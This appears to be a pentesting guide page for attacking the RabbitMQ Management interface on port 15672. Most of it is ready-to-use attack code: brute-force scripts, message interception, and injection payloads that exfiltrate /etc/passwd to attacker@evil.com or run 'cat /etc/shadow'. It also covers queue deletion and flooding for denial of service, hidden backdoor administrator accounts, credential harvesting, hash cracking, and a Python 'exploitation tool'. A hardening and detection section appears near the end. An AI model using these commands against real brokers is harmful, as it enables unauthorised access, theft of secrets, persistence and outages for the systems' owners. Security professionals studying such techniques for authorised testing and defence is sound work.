# RabbitMQ Management - Port 15672 {% tabs %} {% tab title="Support VeryLazyTech πŸŽ‰" %} * Become VeryLazyTech [**member**](https://shop.verylazytech.com/)**! 🎁** * **Follow** us on: * **βœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **πŸ‘Ύ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **πŸ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **πŸ“Ί YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **πŸ“© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **πŸ•΅οΈβ€β™‚οΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. πŸ“š {% endtab %} {% endtabs %} ## Basic info #### What is RabbitMQ? **RabbitMQ** is a message broker that provides: * **Message queuing** - Asynchronous communication * **Routing** - Flexible message routing * **Multiple protocols** - AMQP, MQTT, STOMP * **High availability** - Clustering and mirroring * **Management interface** - Web UI and HTTP API * **Reliability** - Message persistence and acknowledgments #### AMQP Architecture ``` β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ RabbitMQ/AMQP Architecture β”‚ β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€ β”‚ β”‚ β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚Producer 1│──────────►│ Exchange β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ (Direct) β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚ β”‚Producer 2│─────────────────── β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ Routing β”‚ β”‚ β”‚ Keys β”‚ β”‚ β”Œβ”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚ Queues β”‚ β”‚ β”‚ β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€ β”‚ β”‚ β”‚ Queue 1 β”‚β”€β”€β”€β”€β–Ίβ”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚ Queue 2 │────►│Consumer 1β”‚ β”‚ β”‚ β”‚ Queue 3 β”‚β”€β”€β”€β”€β–Ίβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚Consumer 2β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚ β”‚ Management Interface (Port 15672) β”‚ β”‚ β”œβ”€β”€ HTTP API β”‚ β”‚ β”œβ”€β”€ Web UI β”‚ β”‚ └── Monitoring & Control β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ ``` **Ports:** * **15672** - HTTP (Management) * **15671** - HTTPS (Management, if enabled) * **5672** - AMQP (Message broker) * **5671** - AMQPS (Secure AMQP) #### Default Port **Port 15672** - RabbitMQ Management (HTTP) ``` PORT STATE SERVICE 15672/tcp open http RabbitMQ Management ``` ## Reconnaissance & Enumeration #### Port Scanning **Basic Nmap Scan** ```bash # Quick scan nmap -p 15672 -sV # Include AMQP port nmap -p 5672,15672 -sV # Comprehensive scan nmap -p 5671,5672,15671,15672,25672 -sV -A # HTTP scripts nmap -p 15672 --script http-title,http-methods # Scan subnet nmap -p 15672 -sV /24 -oA rabbitmq-scan ``` **Sample Output:** ``` PORT STATE SERVICE VERSION 5672/tcp open amqp RabbitMQ 3.8.9 15672/tcp open http RabbitMQ Management | http-title: RabbitMQ Management |_Requested resource was / ``` #### Web Interface Discovery **Access Management UI** ```bash # HTTP http://:15672/ # HTTPS (if enabled) https://:15671/ ``` **Login Page:** * Default page shows RabbitMQ logo * Login form with username/password * Version information often visible #### API Endpoint Discovery **API Base URL:** ``` http://:15672/api/ ``` **Common API Endpoints:** ```bash # Overview /api/overview # Nodes /api/nodes # Connections /api/connections # Channels /api/channels # Exchanges /api/exchanges # Queues /api/queues # Bindings /api/bindings # Vhosts /api/vhosts # Users /api/users # Permissions /api/permissions # Definitions (complete config) /api/definitions ``` #### Shodan Queries ``` port:15672 RabbitMQ "RabbitMQ Management" port:15672 http.title:"RabbitMQ Management" product:"RabbitMQ" ``` ## Authentication Testing #### Default Credentials **Standard Default:** ``` Username: guest Password: guest Note: guest user only works from localhost by default But often misconfigured to allow remote access ``` **Test Default Credentials:** ```bash # Using curl curl -u guest:guest http://:15672/api/overview # If successful, returns JSON with cluster info ``` #### Common Credentials ``` guest:guest admin:admin administrator:administrator rabbitmq:rabbitmq user:user test:test root:root ``` #### Brute Force Authentication **Using Hydra** ```bash # HTTP Basic Auth brute force hydra -L users.txt -P passwords.txt http-get /api/overview -s 15672 # Single user hydra -l guest -P /usr/share/wordlists/rockyou.txt http-get /api/overview -s 15672 # Verbose mode hydra -L users.txt -P passwords.txt -V http-get /api/overview -s 15672 ``` **Using Metasploit** ```bash msf6 > use auxiliary/scanner/http/rabbitmq_mgmt_login msf6 auxiliary(scanner/http/rabbitmq_mgmt_login) > set RHOSTS msf6 auxiliary(scanner/http/rabbitmq_mgmt_login) > set USER_FILE users.txt msf6 auxiliary(scanner/http/rabbitmq_mgmt_login) > set PASS_FILE passwords.txt msf6 auxiliary(scanner/http/rabbitmq_mgmt_login) > run ``` **Custom Python Script** ```python #!/usr/bin/env python3 """ RabbitMQ Management Brute Force """ import requests from requests.auth import HTTPBasicAuth import sys def brute_force(host, port, username, password_file): """Brute force RabbitMQ Management authentication""" url = f"http://{host}:{port}/api/overview" with open(password_file, 'r') as f: for password in f: password = password.strip() try: r = requests.get(url, auth=HTTPBasicAuth(username, password), timeout=5) if r.status_code == 200: print(f"[+] SUCCESS: {username}:{password}") return password else: print(f"[-] Failed: {username}:{password}") except Exception as e: print(f"[!] Error: {e}") print("[-] Password not found") return None if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: {sys.argv[0]} ") sys.exit(1) brute_force(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4]) ``` ## API Enumeration #### Overview Information **Get Cluster Overview** ```bash # Basic overview curl -u guest:guest http://:15672/api/overview # Returns: { "management_version": "3.8.9", "rates_mode": "basic", "exchange_types": [...], "rabbitmq_version": "3.8.9", "cluster_name": "rabbit@hostname", "erlang_version": "23.1", "node": "rabbit@hostname", ... } ``` #### Node Information **List Nodes** ```bash curl -u guest:guest http://:15672/api/nodes # Returns node details: # - Node name # - OS process ID # - Memory usage # - Disk space # - File descriptors # - Sockets # - Running applications ``` #### Connection Information **List Active Connections** ```bash curl -u guest:guest http://:15672/api/connections # Returns: # - Client IP addresses # - Port numbers # - Connection names # - Virtual host # - User # - Protocol # - Connection state ``` **Extract Client IPs:** ```bash curl -u guest:guest http://:15672/api/connections | jq '.[].peer_host' | sort -u ``` #### Channel Information **List Channels** ```bash curl -u guest:guest http://:15672/api/channels # Shows: # - Active channels # - Channel numbers # - Connection details # - Consumer counts # - Unacknowledged messages ``` #### User Enumeration **List All Users** ```bash curl -u guest:guest http://:15672/api/users # Returns: # - Usernames # - Tags (roles: administrator, management, etc.) # - Password hashes (if permissions allow) ``` **Example Output:** ```json [ { "name": "guest", "password_hash": "gkK...", "hashing_algorithm": "rabbit_password_hashing_sha256", "tags": "administrator" }, { "name": "admin", "password_hash": "xyz...", "hashing_algorithm": "rabbit_password_hashing_sha256", "tags": "administrator" } ] ``` #### Virtual Host Enumeration **List Virtual Hosts** ```bash curl -u guest:guest http://:15672/api/vhosts # Returns: # - Virtual host names # - Messages statistics # - Message rates ``` #### Queue Enumeration **List All Queues** ```bash # All queues curl -u guest:guest http://:15672/api/queues # Queues in specific vhost curl -u guest:guest http://:15672/api/queues/%2F # Note: %2F is URL-encoded "/" ``` **Queue Information Includes:** ```json { "name": "email_queue", "vhost": "/", "durable": true, "auto_delete": false, "messages": 150, "messages_ready": 100, "messages_unacknowledged": 50, "consumers": 3, "memory": 1234567, ... } ``` #### Exchange Enumeration **List Exchanges** ```bash curl -u guest:guest http://:15672/api/exchanges # Shows: # - Exchange names # - Types (direct, fanout, topic, headers) # - Durability # - Auto-delete status # - Message rates ``` #### Binding Enumeration **List Bindings** ```bash # All bindings curl -u guest:guest http://:15672/api/bindings # Bindings for specific queue curl -u guest:guest http://:15672/api/queues/%2F/email_queue/bindings ``` ## Exploitation Techniques #### Message Interception **Read Messages from Queue** ```bash # Get messages (without ack - messages remain) curl -u guest:guest -X POST http://:15672/api/queues/%2F/email_queue/get \ -H "Content-Type: application/json" \ -d '{"count":10,"ackmode":"ack_requeue_false","encoding":"auto"}' # Returns messages with: # - Payload # - Properties # - Routing key # - Exchange ``` **Example Response:** ```json [ { "payload": "{\"to\":\"user@example.com\",\"subject\":\"Password Reset\",\"token\":\"abc123\"}", "payload_bytes": 85, "payload_encoding": "string", "properties": {}, "routing_key": "email", "exchange": "amq.default" } ] ``` #### Message Injection **Publish Message to Queue** ```bash # Publish via default exchange curl -u guest:guest -X POST http://:15672/api/exchanges/%2F/amq.default/publish \ -H "Content-Type: application/json" \ -d '{ "properties": {}, "routing_key": "email_queue", "payload": "{\"to\":\"attacker@evil.com\",\"subject\":\"Malicious\",\"attachments\":[{\"path\":\"/etc/passwd\"}]}", "payload_encoding": "string" }' ``` **Command Injection via Messages:** ```bash # If application processes messages unsafely curl -u guest:guest -X POST http://:15672/api/exchanges/%2F/amq.default/publish \ -H "Content-Type: application/json" \ -d '{ "routing_key": "tasks", "payload": "{\"cmd\":\"id; cat /etc/shadow\"}", "payload_encoding": "string" }' ``` #### Path Traversal Exploitation **File Access via Message Attachments** ```bash # Example: Email service with attachment processing curl -u guest:guest -X POST http://:15672/api/exchanges/%2F/amq.default/publish \ -H "Content-Type: application/json" \ -d '{ "routing_key": "email", "payload": "{\"to\":\"attacker@evil.com\",\"attachments\":[{\"path\":\"../../../../etc/passwd\"}]}", "payload_encoding": "string" }' # Or curl -u guest:guest -X POST http://:15672/api/exchanges/%2F/amq.default/publish \ -H "Content-Type: application/json" \ -d '{ "routing_key": "email", "payload": "{\"to\":\"attacker@evil.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}", "payload_encoding": "string" }' ``` #### Queue Manipulation **Create Malicious Queue** ```bash # Create new queue curl -u guest:guest -X PUT http://:15672/api/queues/%2F/backdoor_queue \ -H "Content-Type: application/json" \ -d '{"durable":false,"auto_delete":false}' ``` **Bind Queue to Exchange** ```bash # Bind to default exchange curl -u guest:guest -X POST http://:15672/api/bindings/%2F/e/amq.default/q/backdoor_queue \ -H "Content-Type: application/json" \ -d '{"routing_key":"backdoor"}' ``` **Purge Queue (DoS)** ```bash # Delete all messages in queue curl -u guest:guest -X DELETE http://:15672/api/queues/%2F/critical_queue/contents ``` #### User Creation (Privilege Escalation) **Create Admin User** ```bash # Create new user with admin privileges curl -u guest:guest -X PUT http://:15672/api/users/backdoor \ -H "Content-Type: application/json" \ -d '{"password":"SecretPass123!","tags":"administrator"}' # Grant permissions curl -u guest:guest -X PUT http://:15672/api/permissions/%2F/backdoor \ -H "Content-Type: application/json" \ -d '{"configure":".*","write":".*","read":".*"}' ``` #### Configuration Export **Dump Complete Configuration** ```bash # Export all definitions curl -u guest:guest http://:15672/api/definitions > rabbitmq_config.json # Contains: # - All users # - All vhosts # - All exchanges # - All queues # - All bindings # - All permissions # - All policies ``` #### Denial of Service **Delete Critical Queues** ```bash # Delete queue curl -u guest:guest -X DELETE http://:15672/api/queues/%2F/critical_queue ``` **Flood with Messages** ```bash # Send large number of messages for i in {1..10000}; do curl -u guest:guest -X POST http://:15672/api/exchanges/%2F/amq.default/publish \ -H "Content-Type: application/json" \ -d "{\"routing_key\":\"email\",\"payload\":\"spam$i\"}" done ``` ## Password Hash Cracking #### Extract Password Hashes **Get User Hashes** ```bash # List users with hashes curl -u guest:guest http://:15672/api/users | jq '.[].password_hash' # Example hash: # "gkK9xWlKn5aZXXXXXXXXXXXXXXXXXXXXXXXXXXXX" ``` #### Crack RabbitMQ Hashes **Hash Format:** RabbitMQ uses salted SHA-256 (or SHA-512 in newer versions) **Extract and Format:** ```bash # Hash format (base64 encoded): # First 4 bytes = salt # Remaining bytes = SHA256(salt + password) # Decode base64 hash echo "gkK9xWlKn5aZXXXXXXXXXXXXXXXXXXXXXXXXXXXX" | base64 -d | xxd -pr -c128 # Output: <8 hex chars salt> # Example: 8240af6d # Format for hashcat echo "gkK9xWlKn5aZXXXXXXXXXXXXXXXXXXXXXXXXXXXX" | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt ``` **Crack with Hashcat** ```bash # Hashcat mode 1420: sha256($salt.$pass) hashcat -m 1420 --hex-salt hash.txt /usr/share/wordlists/rockyou.txt # With rules hashcat -m 1420 --hex-salt hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule # Brute force hashcat -m 1420 --hex-salt hash.txt -a 3 ?a?a?a?a?a?a?a?a ``` ## Post-Exploitation #### Persistence **Create Backdoor User** ```bash # Create hidden admin user curl -u guest:guest -X PUT http://:15672/api/users/.system \ -H "Content-Type: application/json" \ -d '{"password":"HiddenPass123!","tags":"administrator"}' # Grant all permissions curl -u guest:guest -X PUT http://:15672/api/permissions/%2F/.system \ -H "Content-Type: application/json" \ -d '{"configure":".*","write":".*","read":".*"}' ``` **Create Monitoring Queue** ```bash # Create queue for persistent monitoring curl -u guest:guest -X PUT http://:15672/api/queues/%2F/monitor \ -H "Content-Type: application/json" \ -d '{"durable":true}' # Bind to all exchanges curl -u guest:guest -X POST http://:15672/api/bindings/%2F/e/amq.topic/q/monitor \ -H "Content-Type: application/json" \ -d '{"routing_key":"#"}' ``` #### Information Gathering **Application Architecture Discovery** ```bash # Queue names reveal functionality # email_queue β†’ Email service # payment_processor β†’ Payment system # user_notifications β†’ Notification service # task_scheduler β†’ Background jobs # Analyze queue/exchange names curl -u guest:guest http://:15672/api/queues | jq '.[].name' curl -u guest:guest http://:15672/api/exchanges | jq '.[].name' ``` **Credential Harvesting** ```bash # Messages may contain: # - Database credentials # - API keys # - OAuth tokens # - User passwords (password reset tokens) # - Session tokens # Monitor all queues for credentials for queue in $(curl -u guest:guest http://:15672/api/queues | jq -r '.[].name'); do echo "[*] Checking queue: $queue" curl -u guest:guest -X POST http://:15672/api/queues/%2F/$queue/get \ -H "Content-Type: application/json" \ -d '{"count":100,"ackmode":"ack_requeue_true","encoding":"auto"}' | \ grep -i "password\|token\|secret\|key" done ``` #### Lateral Movement **Extract Connection Information** ```bash # Find other systems connecting to RabbitMQ curl -u guest:guest http://:15672/api/connections | jq '.[] | {name: .name, peer_host: .peer_host, user: .user}' # Output: # { # "name": "10.0.0.5:54321 -> 10.0.0.10:5672", # "peer_host": "10.0.0.5", # "user": "app_user" # } # Pivot to these systems ``` ## Defense & Hardening #### Change Default Credentials **Delete Guest User** ```bash # Delete default guest user rabbitmqctl delete_user guest ``` **Create Strong Admin User** ```bash # Create admin with strong password rabbitmqctl add_user admin 'VeryStrongPassword123!@#$' # Set as administrator rabbitmqctl set_user_tags admin administrator # Grant permissions rabbitmqctl set_permissions -p / admin ".*" ".*" ".*" ``` #### Network Security **Bind to Localhost** ```bash # In rabbitmq.conf management.tcp.ip = 127.0.0.1 # Restart RabbitMQ systemctl restart rabbitmq-server ``` **Firewall Rules** ```bash # UFW sudo ufw deny 15672/tcp # Allow only from specific IPs sudo ufw allow from 192.168.1.0/24 to any port 15672 # iptables sudo iptables -A INPUT -p tcp --dport 15672 -s 192.168.1.0/24 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 15672 -j DROP ``` **Use Reverse Proxy** ```nginx # Nginx with authentication server { listen 80; server_name rabbitmq.example.com; location / { proxy_pass http://127.0.0.1:15672; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; auth_basic "RabbitMQ Management"; auth_basic_user_file /etc/nginx/.htpasswd; # IP whitelist allow 192.168.1.0/24; deny all; } } ``` #### Enable SSL/TLS **Configure HTTPS** ```erlang # In rabbitmq.config [ {rabbitmq_management, [ {listener, [ {port, 15671}, {ssl, true}, {ssl_opts, [ {cacertfile, "/path/to/ca_certificate.pem"}, {certfile, "/path/to/server_certificate.pem"}, {keyfile, "/path/to/server_key.pem"}, {verify, verify_peer}, {fail_if_no_peer_cert, true} ]} ]} ]} ]. ``` #### Access Control **Limit User Permissions** ```bash # Create read-only user rabbitmqctl add_user readonly 'ReadOnlyPass123!' rabbitmqctl set_user_tags readonly management # Grant read-only permissions rabbitmqctl set_permissions -p / readonly "^$" "^$" ".*" ``` **Virtual Host Isolation** ```bash # Create separate vhosts for applications rabbitmqctl add_vhost app1 rabbitmqctl add_vhost app2 # Create users per vhost rabbitmqctl add_user app1_user 'pass1' rabbitmqctl set_permissions -p app1 app1_user ".*" ".*" ".*" rabbitmqctl add_user app2_user 'pass2' rabbitmqctl set_permissions -p app2 app2_user ".*" ".*" ".*" ``` #### Monitoring & Detection **Enable Audit Logging** ```erlang # In rabbitmq.config [ {rabbit, [ {log_levels, [{connection, info}]} ]} ]. ``` **Monitor Management Access** ```bash # Watch access logs tail -f /var/log/rabbitmq/rabbit@hostname.log # Look for: # - Failed authentication attempts # - API access from unusual IPs # - User creation/deletion # - Permission changes # - Queue/exchange manipulation ``` **Intrusion Detection Rules** ```bash # Snort rules for RabbitMQ Management alert tcp any any -> any 15672 (msg:"RabbitMQ Management access"; flow:to_server; sid:1000001;) alert tcp any any -> any 15672 (msg:"RabbitMQ user creation attempt"; content:"PUT"; content:"/api/users/"; sid:1000002;) alert tcp any any -> any 15672 (msg:"RabbitMQ configuration export"; content:"/api/definitions"; sid:1000003;) alert tcp any any -> any 15672 (msg:"RabbitMQ message publish"; content:"/publish"; sid:1000004;) ``` #### Regular Security Practices ```bash # Review users rabbitmqctl list_users # Review permissions rabbitmqctl list_permissions -p / # Review connections rabbitmqctl list_connections # Update RabbitMQ regularly # Check: https://www.rabbitmq.com/changelog.html # Backup configuration curl -u admin:password http://localhost:15672/api/definitions > backup.json # Security audit script #!/bin/bash echo "[*] RabbitMQ Security Audit" # Check if guest user exists rabbitmqctl list_users | grep guest if [ $? -eq 0 ]; then echo "[!] WARNING: Guest user still exists!" fi # Check management binding netstat -tlnp | grep 15672 echo "[*] Management listening on above addresses" echo "[*] Audit complete!" ``` ## Tools & Scripts #### Essential Tools 1. **curl** - HTTP API interaction 2. **rabbitmqctl** - CLI management 3. **Metasploit** - Exploitation modules 4. **Python pika** - AMQP client library 5. **Custom scripts** - Automation #### Python Automation Script ```python #!/usr/bin/env python3 """ RabbitMQ Management Exploitation Tool """ import requests from requests.auth import HTTPBasicAuth import json import sys class RabbitMQExploit: def __init__(self, host, port=15672, username='guest', password='guest'): self.host = host self.port = port self.base_url = f"http://{host}:{port}/api" self.auth = HTTPBasicAuth(username, password) def get_overview(self): """Get cluster overview""" r = requests.get(f"{self.base_url}/overview", auth=self.auth) if r.status_code == 200: return r.json() return None def list_queues(self): """List all queues""" r = requests.get(f"{self.base_url}/queues", auth=self.auth) if r.status_code == 200: return r.json() return [] def list_users(self): """List all users""" r = requests.get(f"{self.base_url}/users", auth=self.auth) if r.status_code == 200: return r.json() return [] def read_messages(self, vhost, queue, count=10): """Read messages from queue""" vhost_encoded = vhost.replace('/', '%2F') url = f"{self.base_url}/queues/{vhost_encoded}/{queue}/get" payload = { "count": count, "ackmode": "ack_requeue_true", "encoding": "auto" } r = requests.post(url, auth=self.auth, json=payload) if r.status_code == 200: return r.json() return [] def publish_message(self, vhost, exchange, routing_key, payload): """Publish message to exchange""" vhost_encoded = vhost.replace('/', '%2F') url = f"{self.base_url}/exchanges/{vhost_encoded}/{exchange}/publish" data = { "properties": {}, "routing_key": routing_key, "payload": payload, "payload_encoding": "string" } r = requests.post(url, auth=self.auth, json=data) return r.status_code == 200 def create_user(self, username, password, tags="administrator"): """Create new user""" url = f"{self.base_url}/users/{username}" data = { "password": password, "tags": tags } r = requests.put(url, auth=self.auth, json=data) return r.status_code == 201 def export_definitions(self): """Export complete configuration""" r = requests.get(f"{self.base_url}/definitions", auth=self.auth) if r.status_code == 200: return r.json() return None if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} [username] [password]") sys.exit(1) host = sys.argv[1] username = sys.argv[2] if len(sys.argv) > 2 else 'guest' password = sys.argv[3] if len(sys.argv) > 3 else 'guest' exploit = RabbitMQExploit(host, username=username, password=password) print("[*] RabbitMQ Management Exploitation Tool") print(f"[*] Target: {host}") print("\n[*] Overview:") overview = exploit.get_overview() if overview: print(f" Version: {overview.get('rabbitmq_version')}") print(f" Cluster: {overview.get('cluster_name')}") print("\n[*] Queues:") queues = exploit.list_queues() for queue in queues[:5]: print(f" - {queue['name']} ({queue['messages']} messages)") print("\n[*] Users:") users = exploit.list_users() for user in users: print(f" - {user['name']} ({user.get('tags', 'no tags')})") ``` ## Cheat Sheet #### Quick Reference ```bash # PORT SCANNING nmap -p 15672 -sV # WEB ACCESS http://:15672/ # API OVERVIEW curl -u guest:guest http://:15672/api/overview # LIST QUEUES curl -u guest:guest http://:15672/api/queues # LIST USERS curl -u guest:guest http://:15672/api/users # READ MESSAGES curl -u guest:guest -X POST http://:15672/api/queues/%2F/queue_name/get -H "Content-Type: application/json" -d '{"count":10,"ackmode":"ack_requeue_true"}' # PUBLISH MESSAGE curl -u guest:guest -X POST http://:15672/api/exchanges/%2F/amq.default/publish -H "Content-Type: application/json" -d '{"routing_key":"queue","payload":"data"}' # CREATE USER curl -u guest:guest -X PUT http://:15672/api/users/newuser -H "Content-Type: application/json" -d '{"password":"pass","tags":"administrator"}' # EXPORT CONFIG curl -u guest:guest http://:15672/api/definitions > backup.json ``` #### Important API Endpoints ``` /api/overview - Cluster information /api/nodes - Node details /api/connections - Active connections /api/channels - Channel information /api/queues - Queue list /api/exchanges - Exchange list /api/users - User list /api/definitions - Complete config export ``` #### Default Credentials ``` guest:guest ``` ### Additional Resources * [RabbitMQ Documentation](https://www.rabbitmq.com/documentation.html) * [RabbitMQ Management Plugin](https://www.rabbitmq.com/management.html) * [RabbitMQ Security](https://www.rabbitmq.com/access-control.html) * [AMQP Specification](https://www.amqp.org/specification/0-9-1/amqp-org-download) * [HackTricks RabbitMQ](https://book.hacktricks.wiki/en/network-services-pentesting/15672-pentesting-rabbitmq-management.html) {% hint style="success" %} Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com/)
Support VeryLazyTech πŸŽ‰ * Become VeryLazyTech [**member**](https://shop.verylazytech.com/)**! 🎁** * **Follow** us on: * **βœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **πŸ‘Ύ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **πŸ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **πŸ“Ί YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **πŸ“© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **πŸ•΅οΈβ€β™‚οΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. πŸ“š
{% endhint %}